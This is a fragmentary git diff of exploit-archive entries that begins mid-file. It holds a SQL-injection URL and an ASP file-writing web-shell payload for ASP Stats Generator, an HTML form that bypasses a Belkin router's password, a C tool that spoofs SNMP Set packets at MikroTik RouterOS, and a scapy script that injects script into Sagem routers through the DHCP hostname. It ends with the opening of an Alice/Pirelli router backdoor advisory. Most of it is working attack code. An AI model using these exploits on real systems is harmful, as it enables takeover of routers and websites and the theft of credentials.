File Name:<%=strAsgMapPathTo%>

<% objFSO = Nothing: on error goto 0: hstr = " -[m.r.roohian] -attacker can upload "cmd.asp" with this uploader and ... - - -Solution: -use ASP Stats Generator v2.1.2 (18/06/2006 ) - -# milw0rm.com [2006-06-19] +/*------------------------------------------------ + IHS Public advisory +-------------------------------------------------*/ + +ASP Stats Generator SQL-ASP injection - Code Excution +ASP Stats Generator is a powerful website counter, completely written in ASP programming language. +The application is able to track web site activity generating graphical and statistical reports. +It combines a server side class with a javascript system to get a wide range of visitors' details. +http://www.weppos.com + +Credit: +The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) +The original article can be found at: + +http://www.IHSteam.com +http://www.hamid.ir/security/ + + +Vulnerable Systems: +ASP Stats Generator 2.1.1 - 2.1 and below + +SQL injection : + +Example : +The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: +http://localhost/myasg/pages.asp?order='&mese=1 + +Microsoft JET Database Engine error '80040e14' +Syntax error in string in query expression 'SUM(Visits) ''. +/myasg/pages.asp, line 236 + +Exploit : + +http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 + + +ASP Code Injection : +Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". +This can be exploited to inject arbitrary ASP code. + +Exploit : + +#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.
" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.
" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "
" ): f.Write( content ): response.Write( err.Description & "
" ): f.close: end if %><%=filename%>
<%=path%>
<%= Request("path") %>
- - - - - - - - - - - - - - -
Remote management:
- - Any IP address can remotely manage the router
- Only this IP address can remotely manage the router
- - . - - . - - . - - - -
remote port: - - - -
NAT Enabling:
- - Enable
- - Disable
-
UPnP
- Enable
- - Disable
-
Auto Update Firmware Enabling
- - Enable
- - disable
- - - -
restore factory defaults (and pw:D)
- - - - - - - - - - -# milw0rm.com [2008-08-25] + + + + +html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem.
+ It worked on model F5D7632-4V6 with upgraded firmware 6.01.08. +
+ + Change dns nameservers (ip's can't be the same)
+ + + + + + + +
+ + + + +
+ + +
+
+ + Clear log file
+ + +
+
+ + + Change time, pwd(if you have old pwd), remote management, UPnP:)
+ and automatic firmware update (nice combined with DNS poisoning)
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
old password
+ + +
new password, twice
+ + + + +
login timeout (1-99 minutes)
+ + + +
Time and Time Zone:
+ daylight saving :
+ + timezone(number)
+ + + Enable Automatic Time Server Maintenance
+ + + + + + + + + + + + + + + + +
Remote management:
+ + Any IP address can remotely manage the router
+ Only this IP address can remotely manage the router
+ + . + + . + + . + + + +
remote port: + + + +
NAT Enabling:
+ + Enable
+ + Disable
+
UPnP
+ Enable
+ + Disable
+
Auto Update Firmware Enabling
+ + Enable
+ + disable
+ + + +
restore factory defaults (and pw:D)
+ + + + + + + + + + +# milw0rm.com [2008-08-25] diff --git a/platforms/hardware/remote/6366.c b/platforms/hardware/remote/6366.c index b3ebe3e12..1cdd4ce67 100755 --- a/platforms/hardware/remote/6366.c +++ b/platforms/hardware/remote/6366.c @@ -1,247 +1,247 @@ -/* -------------------------------------------------------------------------- - * (c) ShadOS 2008 - * _ _ _ _ _ __ _ _ _ - * | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ - * | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< - * |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ - * hellknights.void.ru |___/ .0x48k. - * - * -------------------------------------------------------------------------- - * - * Title: MicroTik RouterOS <=3.13 SNMP write (Set request) PoC exploit. - * - * Vendor: www.mikrotik.com - * - * Vulnerable versions: 2.9.51 (2.9.x branch), 3.13 (3.x branch) - * (prior versions also affected). - * - * Funded: 03.09.2008 by ShadOS (http://hellknights.void.ru) - * - * Let's see the manual: - * http://www.mikrotik.com/testdocs/ros/2.9/root/snmp_content.php - * - * - * [QUOTE] - * - * > SNMP Service - * > - * > General Information - * > - * > Summary - * > - * > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring. - * > - * > - * > The MikroTik RouterOS supports: - * > - * > SNMPv1 only - * > Read-only access is provided to the NMS (network management system) - * > User defined communities are supported - * > Get and GetNext actions - * > No Set support - * > No Trap support - * > - * - * - * [/QUOTE] - * - * - * Don't forget to visit our site and my homepage for new releases: - * http://hellknights.void.ru - * http://shados.freeweb7.com - * Also, you can mail me any bugs or suggestions: - * mailto: shados /at/ mail /dot/ ru - * - * Thanks 2 cih.ms and all my friends. - * -------------------------------------------------------------------------- - * - * Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; either version 2, or (at your option) - * any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software Foundation, - * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. - * - * -------------------------------------------------------------------------- - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -unsigned char evilcode[49] = { -0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08, -0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20, -0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64, -0x21 -}; - -unsigned short in_cksum(addr, len) -u_short *addr; -int len; -{ - register int nleft = len; - register u_short *w = addr; - register int sum = 0; - u_short answer = 0; - - while (nleft > 1) { - sum += *w++; - sum += *w++; - nleft -= 2; - } - if (nleft == 1) { - *(u_char *) (&answer) = *(u_char *) w; - sum += answer; - } - sum = (sum >> 17) + (sum & 0xffff); - sum += (sum >> 17); - answer = -sum; - return (answer); -} - -int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) -{ - char *packet; - struct sockaddr_in dstaddr; - struct iphdr *ip; - struct udphdr *udp; - packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len); - memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); - if (packet == NULL) { printf("Malloc failed\n"); exit(-1); } - ip = (struct iphdr *)packet; - udp = (struct udphdr *)(packet+sizeof(struct iphdr)); - ip->saddr = *saddr; - ip->daddr = *daddr; - ip->version = 4; - ip->ihl = 5; - ip->ttl = 255; - ip->id = htons((unsigned short) rand()); - ip->protocol = IPPROTO_UDP; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); - ip->check = in_cksum(ip, sizeof(struct iphdr)); - udp->source = htons(sport); - udp->dest = htons(dport); - udp->len = htons(sizeof(struct udphdr) + len); - memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); - dstaddr.sin_family = AF_INET; - dstaddr.sin_addr.s_addr = *daddr; - if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) - perror("sendto() failed"); - free(packet); -} - -char * makereq(char *community,int *size) -{ - char *buf; - char *ptr; - int len; - int i; - - len = 7 + strlen(community) + sizeof(evilcode); - buf = (char *)malloc(len); - ptr = buf; - - *ptr++ = 0x30; - *ptr++ = len; - - /* Snmp Version */ - *ptr++ = 0x02; - *ptr++ = 0x01; - *ptr++ = 0x00; - - /* Community */ - *ptr++ = 0x04; - *ptr++ = strlen(community); - strcpy(ptr,community); - ptr = ptr + strlen(community); - - - *ptr++ = 0xA3; /* Set Request */ - - memcpy(ptr, evilcode, sizeof(evilcode)); - ptr = ptr + sizeof(evilcode); - - *size = len+1; - - return buf; -} - -int erexit(char *msg) -{ - printf("%s\n",msg); - exit (-1) ; -} - -int usage() -{ - printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); -} - -int main(int argc, char **argv) -{ - char *saddr,*daddr,*community; - unsigned char *buf; - int size; - int sock; - unsigned long lsaddr,ldaddr; - int i; - - saddr = NULL; - daddr = NULL; - if (argc != 7) { usage(); erexit("not enough args\n"); } - - if (!strcmp(argv[1],"-s")) - saddr = strdup(argv[2]); - if (!strcmp(argv[3],"-d")) - daddr = strdup(argv[4]); - if (!strcmp(argv[5],"-c")) - community = strdup(argv[6]); - - printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); - - if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) - erexit("Invalid source/destination IP address\n"); - - if (saddr == NULL) { usage(); erexit("No Source Address"); } - if (daddr == NULL) { usage(); erexit("No Dest Address"); } - - sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); - if (sock == -1) - erexit("Couldnt open Raw socket!(Are you root?)\n"); - - lsaddr = inet_addr(saddr); - ldaddr = inet_addr(daddr); - - buf = makereq(community,&size); - - - printf("Sending %d bytes buffer:\n",size); - for (i=0;i SNMP Service + * > + * > General Information + * > + * > Summary + * > + * > ... RouterOS supports only Get, which means that you can use this implementation only for network monitoring. + * > + * > + * > The MikroTik RouterOS supports: + * > + * > SNMPv1 only + * > Read-only access is provided to the NMS (network management system) + * > User defined communities are supported + * > Get and GetNext actions + * > No Set support + * > No Trap support + * > + * + * + * [/QUOTE] + * + * + * Don't forget to visit our site and my homepage for new releases: + * http://hellknights.void.ru + * http://shados.freeweb7.com + * Also, you can mail me any bugs or suggestions: + * mailto: shados /at/ mail /dot/ ru + * + * Thanks 2 cih.ms and all my friends. + * -------------------------------------------------------------------------- + * + * Copyright (C) 89, 90, 91, 1995-2008 Free Software Foundation. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2, or (at your option) + * any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software Foundation, + * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + * + * -------------------------------------------------------------------------- + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +unsigned char evilcode[49] = { +0x33, 0x02, 0x01, 0x02, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x18, 0x30, 0x16, 0x06, 0x08, +0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x05, 0x00, 0x04, 0x17, 0x57, 0x72, 0x69, 0x74, 0x65, 0x20, +0x69, 0x73, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x73, 0x75, 0x70, 0x70, 0x6F, 0x72, 0x74, 0x65, 0x64, +0x21 +}; + +unsigned short in_cksum(addr, len) +u_short *addr; +int len; +{ + register int nleft = len; + register u_short *w = addr; + register int sum = 0; + u_short answer = 0; + + while (nleft > 1) { + sum += *w++; + sum += *w++; + nleft -= 2; + } + if (nleft == 1) { + *(u_char *) (&answer) = *(u_char *) w; + sum += answer; + } + sum = (sum >> 17) + (sum & 0xffff); + sum += (sum >> 17); + answer = -sum; + return (answer); +} + +int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) +{ + char *packet; + struct sockaddr_in dstaddr; + struct iphdr *ip; + struct udphdr *udp; + packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + len); + memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); + if (packet == NULL) { printf("Malloc failed\n"); exit(-1); } + ip = (struct iphdr *)packet; + udp = (struct udphdr *)(packet+sizeof(struct iphdr)); + ip->saddr = *saddr; + ip->daddr = *daddr; + ip->version = 4; + ip->ihl = 5; + ip->ttl = 255; + ip->id = htons((unsigned short) rand()); + ip->protocol = IPPROTO_UDP; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); + ip->check = in_cksum(ip, sizeof(struct iphdr)); + udp->source = htons(sport); + udp->dest = htons(dport); + udp->len = htons(sizeof(struct udphdr) + len); + memcpy(packet + (sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); + dstaddr.sin_family = AF_INET; + dstaddr.sin_addr.s_addr = *daddr; + if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) + perror("sendto() failed"); + free(packet); +} + +char * makereq(char *community,int *size) +{ + char *buf; + char *ptr; + int len; + int i; + + len = 7 + strlen(community) + sizeof(evilcode); + buf = (char *)malloc(len); + ptr = buf; + + *ptr++ = 0x30; + *ptr++ = len; + + /* Snmp Version */ + *ptr++ = 0x02; + *ptr++ = 0x01; + *ptr++ = 0x00; + + /* Community */ + *ptr++ = 0x04; + *ptr++ = strlen(community); + strcpy(ptr,community); + ptr = ptr + strlen(community); + + + *ptr++ = 0xA3; /* Set Request */ + + memcpy(ptr, evilcode, sizeof(evilcode)); + ptr = ptr + sizeof(evilcode); + + *size = len+1; + + return buf; +} + +int erexit(char *msg) +{ + printf("%s\n",msg); + exit (-1) ; +} + +int usage() +{ + printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); +} + +int main(int argc, char **argv) +{ + char *saddr,*daddr,*community; + unsigned char *buf; + int size; + int sock; + unsigned long lsaddr,ldaddr; + int i; + + saddr = NULL; + daddr = NULL; + if (argc != 7) { usage(); erexit("not enough args\n"); } + + if (!strcmp(argv[1],"-s")) + saddr = strdup(argv[2]); + if (!strcmp(argv[3],"-d")) + daddr = strdup(argv[4]); + if (!strcmp(argv[5],"-c")) + community = strdup(argv[6]); + + printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); + + if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) + erexit("Invalid source/destination IP address\n"); + + if (saddr == NULL) { usage(); erexit("No Source Address"); } + if (daddr == NULL) { usage(); erexit("No Dest Address"); } + + sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); + if (sock == -1) + erexit("Couldnt open Raw socket!(Are you root?)\n"); + + lsaddr = inet_addr(saddr); + ldaddr = inet_addr(daddr); + + buf = makereq(community,&size); + + + printf("Sending %d bytes buffer:\n",size); + for (i=0;i - - - - - - - - -
- - - - - - - - - - -# milw0rm.com [2008-09-17] + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-09-17] diff --git a/platforms/hardware/remote/6477.html b/platforms/hardware/remote/6477.html index 1bd661fb1..281c2e677 100755 --- a/platforms/hardware/remote/6477.html +++ b/platforms/hardware/remote/6477.html @@ -1,26 +1,26 @@ - - - - - - - - - - - - - - - - - - - - - - -# milw0rm.com [2008-09-17] + + + + + + + + + + + + + + + + + + + + + + +# milw0rm.com [2008-09-17] diff --git a/platforms/hardware/remote/6532.py b/platforms/hardware/remote/6532.py index 4fd083074..0b2f6a25a 100755 --- a/platforms/hardware/remote/6532.py +++ b/platforms/hardware/remote/6532.py @@ -1,212 +1,212 @@ -#!/usr/bin/env python -# -# -# -# OOO OOO OO OOO -# O O O O O -# O O O O O -# O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO -# O O OO O O O O O OO O O O O O OO O O O -# O O O O O O OOOOOOO O O O O O O OOOOOOO -# O O O O O O O O O O O O O O -# O O O O O O O O O O O O O O O O O -# OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO -# -# -# Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) Remote CSRF Exploit (dhcp hostname attack) -# -# Discovery Date : 13/09/2009 -# Author : Underz0ne Crew -# Zigma -# Author Of The Tool : Rafael Dominguez Vega -# -# First Of all Read this paper : http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf -# -# Description : Using DHCP as a method of attack, arbitrary and malicious scripting can be injected into the DHCP administrative and logs pages (if enabled). When the web administration toold is accessed, the code injection will execute with administrative privileges, which could lead to a complete compromise of the system. -# -# How To Exploit : -# -# Zigma@Underz0ne # python dhcpattack.py -i eth0 -t 192.168.1.1 -p "" -# -# 0y]Z -# -# Starting.... -# . -# Sent 1 packets. -# -# Now When the Admin Enters to "Advanced Status" "DHCP" the CSRF Get's executed and the account get reseted , now u can simply access the web-based Administration Panel with : admin:admin -# So Many Routers Suffers from dhcp hostname attack... -# -# -# -# -# --/*/-----------------------------------------/*-- -# -# This tool is distributed under a BSD licence. A copy of this -# should have been included with this file. -#Copyright (c) 2008, Rafael Dominguez Vega -# -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. -# * Neither the name of MWR InfoSecurity nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. -# -#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, -#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, -#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR -#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF -#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -# -# -#Copyright (c) 2008, Rafael Dominguez Vega. -# -# This tool is designed for the purpose of performing security -# testing only and is not intended to be used for unlawful -# activities. -# -# This tool can be used to check for DHCP script injection vulnerabilities -# in different sofware products. -# -# Required Libraries: -#scapy.py - "Packet generator/sniffer and network scanner/discovery" -#http://www.secdev.org/projects/scapy/ -# -# Help can be viewed by running this file with --help. -# -# -# Author: Rafael Dominguez Vega -# Version: 0.0.2 -# -# Further information: rafael ({dot}) dominguez-vega <(at)> mwrinfosecurity {(dot)} com -# - -import optparse -from scapy import * -import socket -import fcntl -import struct -import os -import sys -import string -from optparse import OptionParser - -class OptionParser (optparse.OptionParser): - - def check_required (self, opt): - option = self.get_option(opt) - - if getattr(self.values, option.dest) is None: - self.error("%s option not supplied" % option) - -parser = OptionParser() -parser.add_option("-i", "--interface", action="store", dest="hwr",help="Network Interface (required)") -parser.add_option("-t", "--target", action="store", dest="server", help="DHCP Server IP address (required)") -parser.add_option("-p", "--hostname", action="store", dest="payload", help="DHCP Hostname. Between double quotes (\"\") if special characters are used (required)") - -(options, args) = parser.parse_args() - -parser.check_required("-i") -if options.hwr: - hwr = options.hwr -else: - sys.exit(0) - -parser.check_required("-t") -if options.server: - server = options.server -else: - sys.exit(0) - -parser.check_required("-p") -if options.payload: - payload = options.payload -else: - sys.exit(0) - - -#Acknowledgement to Paul Cannon & Frank Millman for the following code chunk - -def get_ip_address(ifname): - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - return socket.inet_ntoa(fcntl.ioctl( - s.fileno(), - 0x8915, - struct.pack('256s', ifname[:15]) - )[20:24]) - -def getMacAddress(): - if sys.platform == 'win32': - for line in os.popen("ipconfig /all"): - if line.lstrip().startswith('Physical Address'): - mac = line.split(':')[1].strip().replace('-',':') - break - else: - for line in os.popen("/sbin/ifconfig"): - if line.find('Ether') > -1: - mac = line.split()[4] - break - return mac - -# end of code chunk - -srcmac = getMacAddress() -ip = get_ip_address(hwr) - - -macad = srcmac.split(":") - -n0 = int(macad[0], 16) -n1 = int(macad[1], 16) -n2 = int(macad[2], 16) -n3 = int(macad[3], 16) -n4 = int(macad[4], 16) -n5 = int(macad[5], 16) - -m0 = chr(n0) -m1 = chr(n1) -m2 = chr(n2) -m3 = chr(n3) -m4 = chr(n4) -m5 = chr(n5) - -print(m0) -chmac = (m0+m1+m2+m3+m4+m5) - -q = ip.split(".") - -t0 = int(q[0]) -t1 = int(q[1]) -t2 = int(q[2]) -t3 = int(q[3]) - -r0 = chr(t0) -r1 = chr(t1) -r2 = chr(t2) -r3 = chr(t3) - -hexip = (r0+r1+r2+r3) - -print chmac -print hexip - -print("Starting....") - -ether = Ether(src= srcmac,dst="ff:ff:ff:ff:ff:ff") -ip = IP(src="0.0.0.0",dst="255.255.255.255") -udp = UDP(sport=68,dport=67) -bootp = BOOTP(op="BOOTREQUEST", chaddr= chmac) -dhcp = DHCP(options=[('message-type',3),('hostname', payload),(50, hexip),("server_id", server),('param_req_list','pad'),('end'),('pad')]) - -discover_packet = ether/ip/udp/bootp/dhcp -sendp(discover_packet) - -# milw0rm.com [2008-09-22] +#!/usr/bin/env python +# +# +# +# OOO OOO OO OOO +# O O O O O +# O O O O O +# O O OO OO OOOOO OOOOO OOO OO OOOOOO O O OO OO OOOOO +# O O OO O O O O O OO O O O O O OO O O O +# O O O O O O OOOOOOO O O O O O O OOOOOOO +# O O O O O O O O O O O O O O +# O O O O O O O O O O O O O O O O O +# OOO OOO OOO OOOOOO OOOOO OOOOO OOOOOO OOO OOO OOO OOOOO +# +# +# Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) Remote CSRF Exploit (dhcp hostname attack) +# +# Discovery Date : 13/09/2009 +# Author : Underz0ne Crew +# Zigma +# Author Of The Tool : Rafael Dominguez Vega +# +# First Of all Read this paper : http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf +# +# Description : Using DHCP as a method of attack, arbitrary and malicious scripting can be injected into the DHCP administrative and logs pages (if enabled). When the web administration toold is accessed, the code injection will execute with administrative privileges, which could lead to a complete compromise of the system. +# +# How To Exploit : +# +# Zigma@Underz0ne # python dhcpattack.py -i eth0 -t 192.168.1.1 -p "" +# +# 0y]Z +# +# Starting.... +# . +# Sent 1 packets. +# +# Now When the Admin Enters to "Advanced Status" "DHCP" the CSRF Get's executed and the account get reseted , now u can simply access the web-based Administration Panel with : admin:admin +# So Many Routers Suffers from dhcp hostname attack... +# +# +# +# +# --/*/-----------------------------------------/*-- +# +# This tool is distributed under a BSD licence. A copy of this +# should have been included with this file. +#Copyright (c) 2008, Rafael Dominguez Vega +# +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +# * Neither the name of MWR InfoSecurity nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. +# +#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +#"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, +#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# +# +#Copyright (c) 2008, Rafael Dominguez Vega. +# +# This tool is designed for the purpose of performing security +# testing only and is not intended to be used for unlawful +# activities. +# +# This tool can be used to check for DHCP script injection vulnerabilities +# in different sofware products. +# +# Required Libraries: +#scapy.py - "Packet generator/sniffer and network scanner/discovery" +#http://www.secdev.org/projects/scapy/ +# +# Help can be viewed by running this file with --help. +# +# +# Author: Rafael Dominguez Vega +# Version: 0.0.2 +# +# Further information: rafael ({dot}) dominguez-vega <(at)> mwrinfosecurity {(dot)} com +# + +import optparse +from scapy import * +import socket +import fcntl +import struct +import os +import sys +import string +from optparse import OptionParser + +class OptionParser (optparse.OptionParser): + + def check_required (self, opt): + option = self.get_option(opt) + + if getattr(self.values, option.dest) is None: + self.error("%s option not supplied" % option) + +parser = OptionParser() +parser.add_option("-i", "--interface", action="store", dest="hwr",help="Network Interface (required)") +parser.add_option("-t", "--target", action="store", dest="server", help="DHCP Server IP address (required)") +parser.add_option("-p", "--hostname", action="store", dest="payload", help="DHCP Hostname. Between double quotes (\"\") if special characters are used (required)") + +(options, args) = parser.parse_args() + +parser.check_required("-i") +if options.hwr: + hwr = options.hwr +else: + sys.exit(0) + +parser.check_required("-t") +if options.server: + server = options.server +else: + sys.exit(0) + +parser.check_required("-p") +if options.payload: + payload = options.payload +else: + sys.exit(0) + + +#Acknowledgement to Paul Cannon & Frank Millman for the following code chunk + +def get_ip_address(ifname): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + return socket.inet_ntoa(fcntl.ioctl( + s.fileno(), + 0x8915, + struct.pack('256s', ifname[:15]) + )[20:24]) + +def getMacAddress(): + if sys.platform == 'win32': + for line in os.popen("ipconfig /all"): + if line.lstrip().startswith('Physical Address'): + mac = line.split(':')[1].strip().replace('-',':') + break + else: + for line in os.popen("/sbin/ifconfig"): + if line.find('Ether') > -1: + mac = line.split()[4] + break + return mac + +# end of code chunk + +srcmac = getMacAddress() +ip = get_ip_address(hwr) + + +macad = srcmac.split(":") + +n0 = int(macad[0], 16) +n1 = int(macad[1], 16) +n2 = int(macad[2], 16) +n3 = int(macad[3], 16) +n4 = int(macad[4], 16) +n5 = int(macad[5], 16) + +m0 = chr(n0) +m1 = chr(n1) +m2 = chr(n2) +m3 = chr(n3) +m4 = chr(n4) +m5 = chr(n5) + +print(m0) +chmac = (m0+m1+m2+m3+m4+m5) + +q = ip.split(".") + +t0 = int(q[0]) +t1 = int(q[1]) +t2 = int(q[2]) +t3 = int(q[3]) + +r0 = chr(t0) +r1 = chr(t1) +r2 = chr(t2) +r3 = chr(t3) + +hexip = (r0+r1+r2+r3) + +print chmac +print hexip + +print("Starting....") + +ether = Ether(src= srcmac,dst="ff:ff:ff:ff:ff:ff") +ip = IP(src="0.0.0.0",dst="255.255.255.255") +udp = UDP(sport=68,dport=67) +bootp = BOOTP(op="BOOTREQUEST", chaddr= chmac) +dhcp = DHCP(options=[('message-type',3),('hostname', payload),(50, hexip),("server_id", server),('param_req_list','pad'),('end'),('pad')]) + +discover_packet = ether/ip/udp/bootp/dhcp +sendp(discover_packet) + +# milw0rm.com [2008-09-22] diff --git a/platforms/hardware/remote/6750.txt b/platforms/hardware/remote/6750.txt index 364b00caf..cf0423752 100755 --- a/platforms/hardware/remote/6750.txt +++ b/platforms/hardware/remote/6750.txt @@ -1,508 +1,508 @@ -############################################################################################# - - saxdax & drpepperONE - - -Discovered embedded backdoor to activate telnet/ftp/tftp/web extended -admin interface with Admin privileges, from internal network lan on -Alice ADSL CPE -Modem/Router, manufactered by Pirelli based on Broadcom platform. - -############################################################################################# - - saxdax & drpepperONE - -Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli - based on Broadcom platform. - -Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2plus]AG2P-AG3[Alice Gate W2+] - /AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] - -Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. - -Platforms: Customized Linux version 2.6.8.1 on BroadcomBCM96348 chipset. - -Vulnerability: enable telnet/ftp/tftp and web-admin frominternal lan. - -Exploitation: internal network lan, versus Router - -Date: 13 Oct 2008 - -Authors: saxdax & drpepperONE - -e-mail: saxdax2@gmail.com drpepppperone@gmail.com - -Risk: medium>low - -############################################################################################# - -1) Introduction -2) Vulnerability -3) The Exploit -4) The Code -5) Fix - -############################################################################################# - -=============== -1) Introduction -=============== - -Telecom Italia is the most important Italian ISP offering an ADSL -service named "Alice". -Telecom Italia rent out with "Alice Adsl" service, different CPE -Modem/Router among which -the affected ones. -The interface to configure these modems are made extremily poor by the -provider to ensure -more control. -There's no way to enable telnet, ftp, tftp or more advanced web pages -from the web interface. - -http://www.telecomitalia.com/ -http://adsl.alice.it/ - -############################################################################################# - -================ -2) Vulnerability -================ - -An attacker can activate and get unauthorized access 